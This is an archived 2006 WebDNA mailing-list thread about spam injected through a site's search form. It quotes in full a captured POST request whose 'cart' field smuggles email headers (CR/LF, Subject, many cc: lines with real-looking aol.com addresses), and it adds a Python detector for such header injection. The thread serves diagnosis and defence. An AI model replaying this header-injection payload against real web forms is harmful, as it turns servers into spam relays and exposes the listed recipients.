SPAM attempts through WebDNA (Was Serious WebDNA Issue)

This WebDNA talk-list message is from 2006. It keeps the original formatting.
Doing some more research on this, I've tracked down the request that sent this data to my site. It was POSTed directly to my search results page using expected variables - full details shown below.

It sent its SPAM message in the Cart field, and then sent "a5042%40popxpress.com" as the value for the remainder of the fields that should have been present - although several were actually missing.

The effect of this was that the SPAM content of this request then appeared to have been cached by WebDNA and was displayed several times in place of an [Include] file - throwing this up on pages displayed to customers on a totally different WebDNA site running on the same server - this continued until the server was restarted.

Two questions:

(1) How can I block this happening with a Mod Rewrite?
(2) Why is WebDNA caching this data?

I understand that they're hoping my server will send this message out when it processes the request, but I'm confused as to the reasons for replacing the rest of the variable values with "a5042%40popxpress.com", what is this supposed to achieve?

http://www.popxpress.com/ /result.tpl cart=biotics%0D%0AContent-Type%3A+multipart%2Falternative%3B+%0A++++++++++++++boundary%3Dc286c15078fef19919450df6f8510b92%0AX-Mailer%3A+GoldMine+%5B5.50.10111%5D%0ASubject%3A+can+be%0Acc%3A+homejspoljar%40aol.com%0Acc%3A+ca23comerww%40aol.com%0Acc%3A+lostsurfer4life%40aol.com%0Acc%3A+fkuntz7575%40aol.com%0Acc%3A+doggybone174%40aol.com%0Acc%3A+sweetjlf%40aol.com%0Acc%3A+ringoent%40aol.com%0Acc%3A+snowmeow98%40aol.com%0Acc%3A+topcopl2%40aol.com%0Acc%3A+dcpsychomunky%40aol.com%0Acc%3A+felix1484860273%40aol.com%0A%0A--c286c15078fef19919450df6f8510b92%0AContent-Transfer-Encoding%3A+7bit%0AContent-Type%3A+text%2Fplain%0A%0Anot+come+from+surface+contact.+n+fact%0A%0A--c286c15078fef19919450df6f8510b92%0AContent-Transfer-Encoding%3A+8bit%0AContent-Type%3A+text%2Fplain%0A%0Aa+gammon+joint.+ashers+of+bacon+are+a+main+constituent+of+the+traditional+%0Arish+breakfast%2C+along+with+sausages.+lthough+ritain+has+a+large+pork+and+%0Abacon+industry%2C+much+of+the+bacon+consumed+in+ritain+is+produced+in+enmark%2C+%0Aand+marketed+as+anish+bacon+%28the+word+anish+is+stamped+on%0A%0A--c286c15078fef19919450df6f8510b92--%0A.%0A&startat=a5042%40popxpress.com&max=a5042%40popxpress.com&Submit=a5042%40popxpress.com&wagroup1data=a5042%40popxpress.com&link=a5042%40popxpress.com&SortOrder=a5042%40popxpress.com&listing=a5042%40popxpress.com&allreqd=a5042%40popxpress.com&group1field=a5042%40popxpress.comREFERER=http%3A//www.popxpress.com/&HOST=www.popxpress.com&CONTENT-TYPE=application/x-www-form-urlencoded&CONNECTION=Keep-Alive&CONTENT-LENGTH=1394&CONNECTION=close&

On Tue, 21 Nov 2006 10:18:26 +0000 Mark Derrick wrote:
> I seem to be having a very similar problem, but with a slight twist
>
> Last night, the following text was served in the place of an included txt
>file.
>
> : sweetjlf@aol.comcc: ringoent@aol.comcc: snowmeow98@aol.comcc:
> topcopl2@aol.comcc: dcpsychomunky@aol.comcc: felix1484860273@aol.com--
>c286c15078fef19919450df6f8510b92Content-Transfer-Encoding: 7bitContent-Type:
>text/plainnot come from surface contact. n fact--
>c286c15078fef19919450df6f8510b92Content-Transfer-Encoding: 8bitContent-Type:
>text/plaina gammon joint. ashers of bacon are a main constituent of the
>traditional rish breakfast, along with sausages. lthough ritain has a large
>pork and bacon industry, much of the bacon consumed in ritain is produced in
>enmark, and marketed as anish bacon (the word anish is stamped on--
>c286c15078fef19919450df6f8510b92--.
>
> The rest of the page was fine, but where [INCLUDE file=^includes/
>sample.txt] was supposed to go, this text appeared instead.
>
> The text file which should have been included has not changed at all, and
>is now appearing correctly.
> Because of this, I cannot see any reason why the above text was displayed.
>
> It's obviously someone trying to send Spam through our server - but why it
>has appeared within a page is seriously worrying me.
> Is WebDNA caching this data and somehow then using it when calling an
> [include] to build a page?
>
> Generally people can try to send spam through my server all they want,
>because I know the server is well protected against such behaviour - but
>after seeing text like this appearing within my pages, I'm now starting to
>seriously worry about WebDNA's security.
>
>
> Thanks for any help you can offer.
>
> Mark.

Associated Messages, from the most recent to the oldest:

    
  1. Re: SPAM attempts through WebDNA (Was Serious WebDNA Issue) ( Mark Derrick 2006)
  2. Re: SPAM attempts through WebDNA (Was Serious WebDNA Issue) ( "sal danna" 2006)
  3. SPAM attempts through WebDNA (Was Serious WebDNA Issue) ( "Mark Derrick" 2006)
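
Added example (not part of the original thread and not WebDNA code): a check for the pattern in the request above, where the cart value carries an encoded CR/LF followed by mail header lines. The function names, the header list and the sample body with example.com addresses are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Mail header names that have no business appearing inside a form field value.
# This list is an assumption for the example; extend it to suit the mailer in use.
MAIL_HEADER = re.compile(
    r"[ \t]*(to|cc|bcc|from|subject|content-type|"
    r"content-transfer-encoding|mime-version|x-mailer)[ \t]*:",
    re.IGNORECASE,
)
LINE_BREAK = re.compile(r"\r\n|\r|\n")


def inspect_form_body(body):
    """Return {field: [header names found after a line break]} for every
    form field whose decoded value contains CR or LF. An empty list means
    the field had a line break but no recognised header after it."""
    findings = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        if LINE_BREAK.search(value):
            # Everything after the first break is what a mailer would read
            # as extra header lines if the value reached a header unchecked.
            lines = LINE_BREAK.split(value)[1:]
            hits = (MAIL_HEADER.match(line) for line in lines)
            findings[name] = [m.group(1).lower() for m in hits if m]
    return findings


def safe_header_value(value):
    """Gate for any value about to be placed in a mail header:
    refuse it outright if it contains a line break."""
    if LINE_BREAK.search(value):
        raise ValueError("line break in header value")
    return value


# Constructed sample, shaped like the request in the post but with
# placeholder addresses and a shortened body.
SAMPLE_BODY = (
    "cart=biotics%0D%0AContent-Type%3A+multipart%2Falternative%3B+boundary%3Dxyz"
    "%0ASubject%3A+hello%0Acc%3A+a%40example.com%0Acc%3A+b%40example.com"
    "%0A%0Abody+text%0A.%0A"
    "&startat=probe%40example.com&max=probe%40example.com"
)
CLEAN_BODY = "cart=biotics&startat=1&max=10"

if __name__ == "__main__":
    print(inspect_form_body(SAMPLE_BODY))
    print(inspect_form_body(CLEAN_BODY))
```

mod_rewrite conditions match the URL and request headers, not a POST body, so a check like this has to run where the decoded form fields are available.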
